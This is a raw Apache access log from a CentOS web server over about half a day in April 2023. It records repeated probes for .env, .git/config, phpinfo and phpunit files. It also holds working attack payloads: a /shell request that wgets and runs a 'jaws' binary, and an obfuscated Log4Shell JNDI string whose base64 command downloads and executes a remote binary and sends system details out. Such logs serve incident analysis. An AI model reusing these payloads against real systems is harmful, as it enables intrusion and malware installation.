152.32.227.252 - - [11/Apr/2023:13:01:19 +0000] "GET /assets/front/10bucksonly/plugins/aos/aos.js HTTP/1.1" 200 4699 "-" "Go-http-client/1.1"
152.32.227.252 - - [11/Apr/2023:13:01:20 +0000] "GET /assets/front/10bucksonly/plugins/bootstrap/js/bootstrap.min.js HTTP/1.1" 200 14966 "-" "Go-http-client/1.1"
152.32.227.252 - - [11/Apr/2023:13:01:21 +0000] "GET /assets/admin/base/plugins/bootstrap-datepicker/js/bootstrap-datepicker.min.js HTTP/1.1" 200 10073 "-" "Go-http-client/1.1"
152.32.227.252 - - [11/Apr/2023:13:01:21 +0000] "GET /assets/front/10bucksonly/plugins/isotope-layout/isotope.pkgd.min.js HTTP/1.1" 200 9847 "-" "Go-http-client/1.1"
152.32.227.252 - - [11/Apr/2023:13:01:21 +0000] "GET /assets/front/10bucksonly/js/typeahead.bundle.js HTTP/1.1" 200 17759 "-" "Go-http-client/1.1"
::1 - - [11/Apr/2023:13:01:26 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [11/Apr/2023:13:01:27 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [11/Apr/2023:13:01:28 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [11/Apr/2023:13:01:29 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [11/Apr/2023:13:01:30 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [11/Apr/2023:13:01:31 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [11/Apr/2023:13:01:32 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
34.140.248.32 - - [11/Apr/2023:13:09:10 +0000] "GET / HTTP/1.1" 200 8384 "-" "python-requests/2.28.2"
135.125.246.189 - - [11/Apr/2023:13:12:45 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
135.125.246.189 - - [11/Apr/2023:13:12:45 +0000] "POST / HTTP/1.1" 405 409698 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
43.154.128.189 - - [11/Apr/2023:13:17:48 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
193.32.162.159 - - [11/Apr/2023:13:37:32 +0000] "GET / HTTP/1.1" 200 8380 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
193.118.53.194 - - [11/Apr/2023:14:06:32 +0000] "GET / HTTP/1.1" 200 8385 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
43.154.128.189 - - [11/Apr/2023:14:38:41 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
::1 - - [11/Apr/2023:14:43:58 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [11/Apr/2023:14:43:59 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [11/Apr/2023:14:44:00 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [11/Apr/2023:14:44:01 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [11/Apr/2023:14:44:02 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [11/Apr/2023:14:44:03 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [11/Apr/2023:14:44:04 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [11/Apr/2023:14:44:05 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [11/Apr/2023:14:44:06 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [11/Apr/2023:14:44:07 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [11/Apr/2023:14:44:08 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [11/Apr/2023:14:44:09 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [11/Apr/2023:14:44:10 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [11/Apr/2023:14:44:11 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [11/Apr/2023:14:44:12 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
109.237.98.226 - - [11/Apr/2023:14:52:37 +0000] "\x16\x03\x01\x01H\x01" 400 226 "-" "-"
109.237.98.226 - - [11/Apr/2023:14:52:37 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
109.237.98.226 - - [11/Apr/2023:14:52:37 +0000] "POST /.env HTTP/1.1" 405 411983 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
135.125.246.189 - - [11/Apr/2023:14:56:39 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
135.125.246.189 - - [11/Apr/2023:14:56:40 +0000] "POST / HTTP/1.1" 405 409734 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
45.79.181.179 - - [11/Apr/2023:15:41:21 +0000] "\x16\x03\x01" 400 226 "-" "-"
193.32.162.159 - - [11/Apr/2023:15:43:25 +0000] "GET / HTTP/1.1" 200 8384 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
43.154.128.189 - - [11/Apr/2023:15:59:36 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
135.125.246.189 - - [11/Apr/2023:16:14:28 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
135.125.246.189 - - [11/Apr/2023:16:14:29 +0000] "POST / HTTP/1.1" 405 409726 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
52.25.14.4 - - [11/Apr/2023:16:22:08 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
52.25.14.4 - - [11/Apr/2023:16:22:09 +0000] "POST / HTTP/1.1" 405 409719 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
52.25.14.4 - - [11/Apr/2023:16:22:11 +0000] "GET /phpmyadmin/ HTTP/1.1" 301 240 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1"
52.25.14.4 - - [11/Apr/2023:16:23:50 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
52.25.14.4 - - [11/Apr/2023:16:23:51 +0000] "POST / HTTP/1.1" 405 409687 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
52.25.14.4 - - [11/Apr/2023:16:23:53 +0000] "GET /phpmyadmin/ HTTP/1.1" 301 240 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1"
135.125.246.189 - - [11/Apr/2023:16:45:51 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
135.125.246.189 - - [11/Apr/2023:16:45:51 +0000] "POST / HTTP/1.1" 405 409710 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
45.79.181.223 - - [11/Apr/2023:17:01:10 +0000] "\x16\x03\x01" 400 226 "-" "-"
43.154.128.189 - - [11/Apr/2023:17:18:50 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
135.125.246.189 - - [11/Apr/2023:18:14:15 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
135.125.246.189 - - [11/Apr/2023:18:14:16 +0000] "POST / HTTP/1.1" 405 409716 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
193.32.162.159 - - [11/Apr/2023:18:32:07 +0000] "GET / HTTP/1.1" 200 8387 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
43.154.128.189 - - [11/Apr/2023:18:37:11 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
192.241.228.9 - - [11/Apr/2023:18:50:59 +0000] "MGLNDD_13.244.159.169_80\n" 400 226 "-" "-"
47.253.60.193 - - [11/Apr/2023:18:52:16 +0000] "GET / HTTP/1.0" 200 41463 "-" "-"
47.253.60.193 - - [11/Apr/2023:18:52:17 +0000] "GET /1681239137 HTTP/1.1" 200 - "-" "Mozilla/5.0"
47.253.60.193 - - [11/Apr/2023:18:52:17 +0000] "GET / HTTP/1.0" 200 41463 "-" "-"
47.253.60.193 - - [11/Apr/2023:18:52:18 +0000] "GET /text/try1681239137 HTTP/1.1" 200 - "-" "Mozilla/5.0"
47.253.60.193 - - [11/Apr/2023:18:52:17 +0000] "POST /sdk HTTP/1.1" 405 406134 "-" "Mozilla/5.0"
47.253.60.193 - - [11/Apr/2023:18:52:27 +0000] "\x16\x03\x01\x02" 400 226 "-" "-"
47.253.60.193 - - [11/Apr/2023:18:52:29 +0000] "GET / HTTP/1.0" 200 41463 "-" "-"
47.253.60.193 - - [11/Apr/2023:18:52:30 +0000] "GET / HTTP/1.1" 200 41226 "-" "-"
47.253.60.193 - - [11/Apr/2023:18:52:30 +0000] "GET / HTTP/1.1" 200 8382 "-" "Opera/9.80 (Windows NT 6.1; U; en) Presto/2.8.131 Version/11.11"
47.253.60.193 - - [11/Apr/2023:18:52:31 +0000] "GET /assets/front/base/images/favicon/16_16/favicon.png HTTP/1.1" 200 3098 "-" "curl/7.75.0"
47.253.60.193 - - [11/Apr/2023:18:52:31 +0000] "GET /robots.txt HTTP/1.1" 200 24 "-" "curl/7.75.0"
::1 - - [11/Apr/2023:19:00:17 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [11/Apr/2023:19:00:21 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [11/Apr/2023:19:00:39 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [11/Apr/2023:19:00:43 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [11/Apr/2023:19:00:49 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [11/Apr/2023:19:01:01 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [11/Apr/2023:19:01:03 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [11/Apr/2023:19:01:04 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [11/Apr/2023:19:01:09 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [11/Apr/2023:19:01:24 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [11/Apr/2023:19:01:30 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
18.188.158.164 - - [11/Apr/2023:19:24:05 +0000] "GET /.git/config HTTP/1.1" 200 - "-" "python-requests/2.25.1"
43.154.128.189 - - [11/Apr/2023:19:55:25 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
193.32.162.159 - - [11/Apr/2023:20:18:38 +0000] "GET / HTTP/1.1" 200 8380 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
198.235.24.141 - - [11/Apr/2023:20:26:55 +0000] "GET / HTTP/1.0" 200 41463 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers&#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
135.125.246.189 - - [11/Apr/2023:20:55:11 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
135.125.246.189 - - [11/Apr/2023:20:55:12 +0000] "POST / HTTP/1.1" 405 409734 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
200.215.163.144 - - [11/Apr/2023:21:02:59 +0000] "GET /shell?cd+/tmp;rm+-rf+*;wget+167.71.210.63/jaws;sh+/tmp/jaws HTTP/1.1" 200 - "-" "Hello, world"
45.33.80.243 - - [11/Apr/2023:21:05:50 +0000] "\x16\x03\x01" 400 226 "-" "-"
95.214.55.244 - - [11/Apr/2023:21:08:19 +0000] "GET / HTTP/1.1" 200 41226 "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//129.151.84.124:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTM0LjY1LjYyLjY0Ly5jb25maWcvemxpYjQ1IDsgY3VybCAtTyBodHRwOi8vMTM0LjY1LjYyLjY0Ly5jb25maWcvemxpYjQ1IDsgY2htb2QgK3ggemxpYjQ1IDsgY2htb2QgNzc3IHpsaWI0NSA7IC4vemxpYjQ1IDIgOyBzdWRvIC4vemxpYjQ1IDIgOyBybSAtcmYgemxpYjQ1OyBjdXJsIGh0dHA6Ly8xMjkuMTUxLjY0LjU1L2FyY2gvJCh1bmFtZSAtbSkvdXNlci8kKHdob2FtaSk7IHN1ZG8gY3VybCBodHRwOi8vMTI5LjE1MS42NC41NS9hcmNoLyQodW5hbWUgLW0pL3VzZXIvJCh3aG9hbWkp}')" "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//129.151.84.124:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTM0LjY1LjYyLjY0Ly5jb25maWcvemxpYjQ1IDsgY3VybCAtTyBodHRwOi8vMTM0LjY1LjYyLjY0Ly5jb25maWcvemxpYjQ1IDsgY2htb2QgK3ggemxpYjQ1IDsgY2htb2QgNzc3IHpsaWI0NSA7IC4vemxpYjQ1IDIgOyBzdWRvIC4vemxpYjQ1IDIgOyBybSAtcmYgemxpYjQ1OyBjdXJsIGh0dHA6Ly8xMjkuMTUxLjY0LjU1L2FyY2gvJCh1bmFtZSAtbSkvdXNlci8kKHdob2FtaSk7IHN1ZG8gY3VybCBodHRwOi8vMTI5LjE1MS42NC41NS9hcmNoLyQodW5hbWUgLW0pL3VzZXIvJCh3aG9hbWkp}')"
104.152.52.225 - - [11/Apr/2023:21:09:06 +0000] "GET / HTTP/1.0" 200 41463 "-" "masscan/1.3 (https://github.com/robertdavidgraham/masscan)"
43.154.128.189 - - [11/Apr/2023:21:13:40 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
185.254.196.173 - - [11/Apr/2023:22:00:45 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
185.254.196.173 - - [11/Apr/2023:22:00:45 +0000] "POST / HTTP/1.1" 405 409736 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
193.32.162.159 - - [11/Apr/2023:22:03:14 +0000] "GET / HTTP/1.1" 200 8382 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
135.125.246.189 - - [11/Apr/2023:22:07:25 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
135.125.246.189 - - [11/Apr/2023:22:07:26 +0000] "POST / HTTP/1.1" 405 409696 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
43.154.128.189 - - [11/Apr/2023:22:31:53 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
61.0.11.204 - - [11/Apr/2023:22:49:23 +0000] "GET / HTTP/1.1" 200 41226 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
45.79.128.205 - - [11/Apr/2023:22:59:39 +0000] "\x16\x03\x01" 400 226 "-" "-"
205.210.31.147 - - [11/Apr/2023:23:06:54 +0000] "GET / HTTP/1.1" 200 41226 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers&#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
185.254.196.173 - - [11/Apr/2023:23:32:37 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
185.254.196.173 - - [11/Apr/2023:23:32:38 +0000] "POST / HTTP/1.1" 405 409696 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
::1 - - [11/Apr/2023:23:33:18 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [11/Apr/2023:23:33:19 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [11/Apr/2023:23:33:20 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
205.210.31.35 - - [11/Apr/2023:23:43:57 +0000] "\x16\x03\x01" 400 226 "-" "-"
135.125.246.189 - - [11/Apr/2023:23:48:19 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
135.125.246.189 - - [11/Apr/2023:23:48:19 +0000] "POST / HTTP/1.1" 405 409744 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
43.154.128.189 - - [11/Apr/2023:23:50:00 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
193.32.162.159 - - [12/Apr/2023:00:06:12 +0000] "GET / HTTP/1.1" 200 8385 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
87.236.176.253 - - [12/Apr/2023:00:40:48 +0000] "GET / HTTP/1.1" 200 8381 "-" "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)"
87.236.176.167 - - [12/Apr/2023:00:40:48 +0000] "GET /assets/front/base/images/favicon/16_16/favicon.png HTTP/1.1" 200 3098 "-" "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)"
87.236.176.110 - - [12/Apr/2023:00:40:48 +0000] "GET /assets/img/apple-touch-icon.png HTTP/1.1" 200 - "-" "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)"
135.125.246.189 - - [12/Apr/2023:00:52:47 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
135.125.246.189 - - [12/Apr/2023:00:52:47 +0000] "POST / HTTP/1.1" 405 409704 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
43.154.128.189 - - [12/Apr/2023:01:08:34 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
20.163.104.4 - - [12/Apr/2023:01:25:55 +0000] "GET / HTTP/1.1" 200 8441 "-" "python-requests/2.27.1"
20.241.104.251 - - [12/Apr/2023:01:26:03 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.241.104.251 - - [12/Apr/2023:01:26:04 +0000] "POST / HTTP/1.1" 405 409721 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
3.87.117.13 - - [12/Apr/2023:01:32:42 +0000] "GET /.git/config HTTP/1.1" 200 - "-" "python-requests/2.25.1"
3.87.117.13 - - [12/Apr/2023:01:32:42 +0000] "GET /admin-app/.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
3.87.117.13 - - [12/Apr/2023:01:32:43 +0000] "POST /admin-app/.env HTTP/1.1" 405 412572 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
3.87.117.13 - - [12/Apr/2023:01:32:46 +0000] "GET /frontend_dev.php/$ HTTP/1.1" 200 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
3.87.117.13 - - [12/Apr/2023:01:32:47 +0000] "GET /debug/default/view?panel=config HTTP/1.1" 200 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
3.87.117.13 - - [12/Apr/2023:01:32:47 +0000] "GET /config.json HTTP/1.1" 200 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
3.87.117.13 - - [12/Apr/2023:01:32:48 +0000] "GET /.json HTTP/1.1" 200 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
3.87.117.13 - - [12/Apr/2023:01:32:49 +0000] "GET /phpinfo.php HTTP/1.1" 200 23912 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
3.87.117.13 - - [12/Apr/2023:01:32:49 +0000] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 405 413727 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36"
193.32.162.159 - - [12/Apr/2023:01:39:31 +0000] "GET / HTTP/1.1" 200 8380 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
104.211.220.126 - - [12/Apr/2023:01:40:00 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (Macintosh;                 Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML,                 like Gecko) Chrome/39.0.2171.95 Safari/537.36"
104.211.220.126 - - [12/Apr/2023:01:40:01 +0000] "GET /sendgrid.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (Macintosh;                 Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML,                 like Gecko) Chrome/39.0.2171.95 Safari/537.36"
104.211.220.126 - - [12/Apr/2023:01:40:02 +0000] "GET /core/.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (Macintosh;                 Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML,                 like Gecko) Chrome/39.0.2171.95 Safari/537.36"
